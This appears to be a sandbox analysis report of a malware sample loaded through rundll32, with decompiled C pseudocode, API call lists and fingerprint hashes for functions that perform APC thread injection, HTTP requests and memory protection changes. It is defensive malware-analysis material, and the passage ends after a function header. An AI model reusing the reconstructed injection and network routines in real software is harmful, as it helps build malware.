Part of subcall function 004010A8: HeapAlloc.KERNEL32(00000000,?,0040132F,00000030,76D863F0,00000000), ref: 004010B4

GetModuleHandleA.KERNEL32(?,00000020), ref: 0040146A
GetProcAddress.KERNEL32(00000000,?), ref: 0040148C
GetProcAddress.KERNEL32(00000000,?), ref: 004014A2
GetProcAddress.KERNEL32(00000000,?), ref: 004014B8
GetProcAddress.KERNEL32(00000000,?), ref: 004014CE
GetProcAddress.KERNEL32(00000000,?), ref: 004014E4

Part of subcall function 00401000: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000), ref: 0040105D
Part of subcall function 00401000: memset.NTDLL ref: 0040107F

Memory Dump Source

Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_rundll32.jbxd

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 94c43a8c686b7e126bf86f2b395185f0a28678a32bffcfbe4af60c18d2b4d7b8
Instruction ID: 105e870436915158aafb714f94c0b7d762a42eb9e761d69ac37881a28e6df3cf
Opcode Fuzzy Hash: 94c43a8c686b7e126bf86f2b395185f0a28678a32bffcfbe4af60c18d2b4d7b8
Instruction Fuzzy Hash: 90211EB1600A0AAFD711DF79DD84D6B77ECEB8434470045B6E905EB2A1E774E9048B68

Uniqueness

Uniqueness Score: -1.00%

Function 00401846 Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x404188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x40418c;
						if( *0x40418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x404198;
								if( *0x404198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x40418c);
						}
						HeapDestroy( *0x404190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x404188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x404190 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x4041b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E00402009(E00401B7F, E00401EFE(_a12, 1, 0x404198, _t41));
							 *0x40418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x00401849
0x00401855
0x00401857
0x0040185a
0x004018d0
0x004018d6
0x004018d8
0x004018da
0x004018e0
0x004018e2
0x004018e7
0x004018ea
0x004018f5
0x004018f7
0x00000000
0x00000000
0x004018f9
0x004018fc
0x004018fe
0x00000000
0x00000000
0x00000000
0x004018fe
0x00401906
0x00401906
0x00401912
0x00401912
0x0040185c
0x0040185d
0x0040187d
0x00401883
0x00401888
0x0040188a
0x004018c6
0x004018c6
0x0040188c
0x00401894
0x0040189b
0x004018a5
0x004018b1
0x004018b6
0x004018bd
0x004018c2
0x00000000
0x004018c2
0x004018bd
0x0040188a
0x0040185d
0x0040191f

APIs

InterlockedIncrement.KERNEL32(00404188), ref: 00401868
HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 0040187D

Part of subcall function 00402009: CreateThread.KERNEL32(00000000,00000000,00000000,?,00404198,004018B6), ref: 00402020
Part of subcall function 00402009: QueueUserAPC.KERNEL32(?,00000000,?), ref: 00402035
Part of subcall function 00402009: GetLastError.KERNEL32(00000000), ref: 00402040
Part of subcall function 00402009: TerminateThread.KERNEL32(00000000,00000000), ref: 0040204A
Part of subcall function 00402009: CloseHandle.KERNEL32(00000000), ref: 00402051
Part of subcall function 00402009: SetLastError.KERNEL32(00000000), ref: 0040205A

InterlockedDecrement.KERNEL32(00404188), ref: 004018D0
SleepEx.KERNEL32(00000064,00000001), ref: 004018EA
CloseHandle.KERNEL32 ref: 00401906
HeapDestroy.KERNEL32 ref: 00401912

Memory Dump Source

Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_rundll32.jbxd

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 5f6ee9829bc5e38d0b9537be7a27de4f79759a9c147f920d0715ad7cd92f5832
Instruction ID: abfa0a05f8ce590ba779cb15af173fe24238ba7469b5255a57a393ea10d0d911
Opcode Fuzzy Hash: 5f6ee9829bc5e38d0b9537be7a27de4f79759a9c147f920d0715ad7cd92f5832
Instruction Fuzzy Hash: 2B21ABF1601205AFC710AFA9DD88A1A7BACE795761710413BFA05F72F0D6388E40DBAC

Uniqueness

Uniqueness Score: -1.00%

Function 044B6954 Relevance: 9.0, APIs: 6, Instructions: 45
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B6954(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0) {
					_t9 = E044B45C4(__eax + 4, _t18, _a4, __eax, __eax + 4); // executed
					if(_t9 == 0) {
						L9:
						return GetLastError();
					}
				}
				_t10 = E044B7AF1(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x044b6954
0x044b6961
0x044b6963
0x044b696e
0x044b6975
0x044b69c6
0x00000000
0x044b69c6
0x044b6975
0x044b697b
0x044b6982
0x044b698e
0x044b6993
0x044b69a9
0x044b69b9
0x00000000
0x044b69ab
0x044b69ab
0x044b69b2
0x044b69bf
0x044b69bf
0x044b69bf
0x044b69b2
0x044b69a9
0x044b69c4
0x00000000
0x00000000
0x044b69ca

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,044B37A0,?,?,76DC81D0,00000000), ref: 044B698E
ResetEvent.KERNEL32(?), ref: 044B6993
HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 044B69A0
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,044B593D,00000000,?,?), ref: 044B69AB
GetLastError.KERNEL32(?,?,00000102,044B37A0,?,?,76DC81D0,00000000), ref: 044B69C6

Part of subcall function 044B45C4: lstrlen.KERNEL32(00000000,00000008,?,76D84D40,?,?,044B6973,?,?,?,?,00000102,044B37A0,?,?,76DC81D0), ref: 044B45D0
Part of subcall function 044B45C4: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,044B6973,?,?,?,?,00000102,044B37A0,?), ref: 044B462E
Part of subcall function 044B45C4: lstrcpy.KERNEL32(00000000,00000000), ref: 044B463E

SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,044B593D,00000000,?), ref: 044B69B9

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
String ID:
API String ID: 3739416942-0
Opcode ID: bbabbd9aa717b95386c40f0b7e93be6488f1b41e3929e392b81972fd34cb8f2b
Instruction ID: e2a1f19d294405018504e051f694324c7fa63698ab950549b6c0cac6b2534d8e
Opcode Fuzzy Hash: bbabbd9aa717b95386c40f0b7e93be6488f1b41e3929e392b81972fd34cb8f2b
Instruction Fuzzy Hash: 08016D71104610ABEF306F71DD44F9B7AA8EF85364F15062AF691D12E0DB20F814DAF2

Uniqueness

Uniqueness Score: -1.00%

Function 00402009 Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402009(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x4041c0, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x00402020
0x00402026
0x0040202a
0x00402035
0x0040203d
0x00402046
0x0040204a
0x00402051
0x00402058
0x0040205a
0x00402060
0x0040203d
0x00402064

APIs

CreateThread.KERNEL32(00000000,00000000,00000000,?,00404198,004018B6), ref: 00402020
QueueUserAPC.KERNEL32(?,00000000,?), ref: 00402035
GetLastError.KERNEL32(00000000), ref: 00402040
TerminateThread.KERNEL32(00000000,00000000), ref: 0040204A
CloseHandle.KERNEL32(00000000), ref: 00402051
SetLastError.KERNEL32(00000000), ref: 0040205A

Memory Dump Source

Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_rundll32.jbxd

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: bd91085eaad74993bc8c73d6488a1e5d8a6c931f1c7c4fd04b4e78363ccbead8
Instruction ID: e9a7e948bdd70d52c4fe7eb18a0cac34ca85a720d9026275d4db5b641dc0697e
Opcode Fuzzy Hash: bd91085eaad74993bc8c73d6488a1e5d8a6c931f1c7c4fd04b4e78363ccbead8
Instruction Fuzzy Hash: BAF05E32602220BBD7215FA0AE4CF5BBF6CFB08752F004524F605B01A4C7318A008B99

Uniqueness

Uniqueness Score: -1.00%

Function 044B3D2C Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E044B3D2C(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E044B3CFD();
				if(_t21 != 0) {
					_t59 =  *0x44ba2fc; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x44ba2fc = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x44ba178(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E044B389E( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x44ba348; // 0x9ad5a8
					if( *0x44ba2fc > 5) {
						_t8 = _t26 + 0x44bb5c5; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x44bb9fd; // 0x44283a44
						_t27 = _t7;
					}
					E044B6B80(_t27, _t27);
					_t31 = E044B76BB(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0x44ba310 =  *0x44ba310 ^ 0x81bbe65d;
						_t32 = E044B6D63(0x60);
						 *0x44ba3cc = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x44ba3cc; // 0x4e695b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x44ba3cc; // 0x4e695b0
							 *_t51 = 0x44bb827;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x44ba2d8, 0, 0x43);
							 *0x44ba368 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x44ba2fc; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x44ba348; // 0x9ad5a8
								_t13 = _t58 + 0x44bb552; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x44b9287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E044B3365( ~_v8 &  *0x44ba310, 0x44ba00c); // executed
								_t42 = E044B1645(0, _t55, _t63, 0x44ba00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E044B3981(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E044B661D(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E044B529C(__eflags,  &(_t67[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x44ba17c();
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E044B7928(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x044b3d2c
0x044b3d36
0x044b3d39
0x044b3d3c
0x044b3d3f
0x044b3d46
0x044b3d48
0x044b3d54
0x044b3d56
0x044b3d56
0x044b3d5f
0x044b3d65
0x044b3d6a
0x044b3d84
0x044b3d90
0x044b3d92
0x044b3d97
0x044b3da1
0x044b3da1
0x044b3d99
0x044b3d99
0x044b3d99
0x044b3d99
0x044b3da8
0x044b3db5
0x044b3dbc
0x044b3dc1
0x044b3dc1
0x044b3dca
0x044b3dcd
0x044b3df3
0x044b3dff
0x044b3e04
0x044b3e09
0x044b3e0b
0x044b3e37
0x044b3e39
0x044b3e0d
0x044b3e11
0x044b3e16
0x044b3e1b
0x044b3e22
0x044b3e28
0x044b3e2d
0x044b3e33
0x044b3e3a
0x044b3e3c
0x044b3e3e
0x044b3e4d
0x044b3e53
0x044b3e58
0x044b3e5a
0x044b3e8a
0x044b3e8c
0x044b3e5c
0x044b3e5c
0x044b3e62
0x044b3e6f
0x044b3e75
0x044b3e75
0x044b3e7d
0x044b3e86
0x044b3e8d
0x044b3e8f
0x044b3e91
0x044b3e98
0x044b3ea5
0x044b3eaa
0x044b3eaf
0x044b3eb1
0x044b3eb3
0x00000000
0x00000000
0x044b3eb5
0x044b3eba
0x044b3ebc
0x044b3ec3
0x044b3ec7
0x044b3eca
0x044b3edf
0x044b3ee3
0x044b3ee8
0x00000000
0x044b3ee8
0x044b3ecc
0x044b3ece
0x00000000
0x00000000
0x044b3ed9
0x044b3edb
0x044b3edd
0x00000000
0x00000000
0x00000000
0x044b3edd
0x044b3ec0
0x044b3ec0
0x044b3e91
0x044b3dcf
0x044b3dcf
0x044b3dd4
0x044b3eea
0x044b3eef
0x044b3ef7
0x044b3ef7
0x00000000
0x044b3eef
0x044b3dda
0x044b3ddd
0x044b3de7
0x044b3dee
0x00000000
0x044b3eff
0x044b3eff
0x044b3f02
0x044b3f06
0x044b3f06

APIs

Part of subcall function 044B3CFD: GetModuleHandleA.KERNEL32(4C44544E,00000000,044B3D44,00000001), ref: 044B3D0C

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 044B3DC1

Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F

memset.NTDLL ref: 044B3E11
RtlInitializeCriticalSection.NTDLL(04E69570), ref: 044B3E22

Part of subcall function 044B529C: memset.NTDLL ref: 044B52B6
Part of subcall function 044B529C: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 044B52FC
Part of subcall function 044B529C: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 044B5307

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 044B3E4D
wsprintfA.USER32 ref: 044B3E7D

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: a01c1ddebb8438db1f8c15c18256c331055fb296a3468b26775e388e4f64f647
Instruction ID: 7340a9b290dea9adb95dbc08caa5f090bab8fd9c156a44f89680739fb1102fbb
Opcode Fuzzy Hash: a01c1ddebb8438db1f8c15c18256c331055fb296a3468b26775e388e4f64f647
Instruction Fuzzy Hash: E7519671A00225ABFF219FA6DC45AEF77A8EB04704F04481BE981E7341E775B9448BF0

Uniqueness

Uniqueness Score: -1.00%

Function 044B19E2 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E044B19E2(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E044B6D63(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E044B6C2C(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E044B6D63((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x44ba318 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x044b19e9
0x044b19f0
0x044b19f5
0x044b19f8
0x044b19ff
0x044b1a02
0x044b1a05
0x044b1a0a
0x044b1a0f
0x044b1b63
0x044b1b65
0x044b1b67
0x044b1b6c
0x044b1b6c
0x044b1a15
0x044b1a18
0x044b1a1b
0x044b1a1d
0x044b1a1d
0x044b1a21
0x00000000
0x00000000
0x044b1a25
0x044b1a51
0x044b1a56
0x044b1a58
0x044b1a58
0x044b1a5b
0x044b1a5e
0x044b1a5e
0x044b1a60
0x00000000
0x044b1a2b
0x044b1a2d
0x044b1a4c
0x044b1a4c
0x044b1a63
0x044b1a63
0x044b1a64
0x044b1a64
0x044b1a67
0x00000000
0x00000000
0x00000000
0x044b1a67
0x044b1a31
0x044b1a78
0x044b1a7c
0x044b1b56
0x044b1b58
0x044b1b58
0x044b1b59
0x044b1b5c
0x00000000
0x044b1b5c
0x044b1a85
0x044b1a96
0x044b1a9a
0x044b1b52
0x00000000
0x044b1b52
0x044b1aa0
0x044b1aa3
0x044b1aa7
0x044b1aab
0x044b1ab0
0x044b1b48
0x044b1b48
0x00000000
0x044b1b4e
0x044b1abb
0x044b1ac4
0x044b1ad8
0x044b1adf
0x044b1af4
0x044b1afa
0x044b1b02
0x00000000
0x00000000
0x00000000
0x00000000
0x044b1b04
0x044b1b04
0x044b1b04
0x044b1b0b
0x044b1b13
0x00000000
0x00000000
0x044b1b15
0x044b1b1e
0x00000000
0x00000000
0x00000000
0x044b1b20
0x044b1b22
0x044b1b25
0x044b1b25
0x044b1b28
0x044b1b2c
0x044b1b2f
0x044b1b35
0x044b1b38
0x044b1b3f
0x00000000
0x044b1abb
0x044b1a36
0x044b1a3e
0x044b1a44
0x044b1a46
0x044b1a46
0x044b1a49
0x044b1a4b
0x00000000
0x044b1a4b
0x044b1a25
0x044b1a6b
0x044b1a70
0x044b1a72
0x044b1a72
0x044b1a75
0x044b1a75
0x00000000

APIs

Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F

lstrcpy.KERNEL32(69B25F45,00000020), ref: 044B1ADF
lstrcat.KERNEL32(69B25F45,00000020), ref: 044B1AF4
lstrcmp.KERNEL32(00000000,69B25F45), ref: 044B1B0B
lstrlen.KERNEL32(69B25F45), ref: 044B1B2F

Strings

, xrefs: 044B1A78

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 92bde0af5100e133a4087591ffc691481c480c0897bdc74fc11bd2bfe1e443bf
Instruction ID: b8174c5b42b030f56accd728164fb31bc371c071bd1c92f118e894d28d2f251a
Opcode Fuzzy Hash: 92bde0af5100e133a4087591ffc691481c480c0897bdc74fc11bd2bfe1e443bf
Instruction Fuzzy Hash: C151A231A04108EBDF21CF99C5946EEBBB6EF45390F15815BE8959B201D770BA51CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02D51A0A Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 218memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32 ref: 02D51A61
VirtualProtect.KERNEL32 ref: 02D51AE2

Strings

X, xrefs: 02D51B95

Memory Dump Source

Source File: 00000003.00000002.951031091.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d50000_rundll32.jbxd

Similarity

API ID: ProtectVirtual
String ID: X
API String ID: 544645111-3081909835
Opcode ID: 6dea49ffef48e7161a3c100a3423d4f4514289b8c1cabef067fb8b0a5c0c13aa
Instruction ID: db70708f73bbb4a75a97daa97544476aa5dc17d271327944ed13e2f7ecbf246d
Opcode Fuzzy Hash: 6dea49ffef48e7161a3c100a3423d4f4514289b8c1cabef067fb8b0a5c0c13aa
Instruction Fuzzy Hash: E8B1ADB4E002288FDB68CF59C890B9DFBB1FF48314F1581AAD908AB356D775A985CF41

Uniqueness

Uniqueness Score: -1.00%

Function 044B74FE Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 044B755B
SysAllocString.OLEAUT32(044B3520), ref: 044B759F
SysFreeString.OLEAUT32(00000000), ref: 044B75B3
SysFreeString.OLEAUT32(00000000), ref: 044B75C1

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: df62541b516422819c293c9e18c37cbebcbd3159b506f1aec883b78a09c229b5
Instruction ID: 428cf64db9779470acdd256355faa577be21f0a462b1e5732101feae8b736052
Opcode Fuzzy Hash: df62541b516422819c293c9e18c37cbebcbd3159b506f1aec883b78a09c229b5
Instruction Fuzzy Hash: B031FF75900249EFDF05CF98D8809EE7BB9FF48340B10842EF94697651D774AA41CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 044B4B89 Relevance: 6.0, APIs: 4, Instructions: 44
sleepthreadtimeCOMMON

Download Yara Rule

C-Code - Quality: 65%

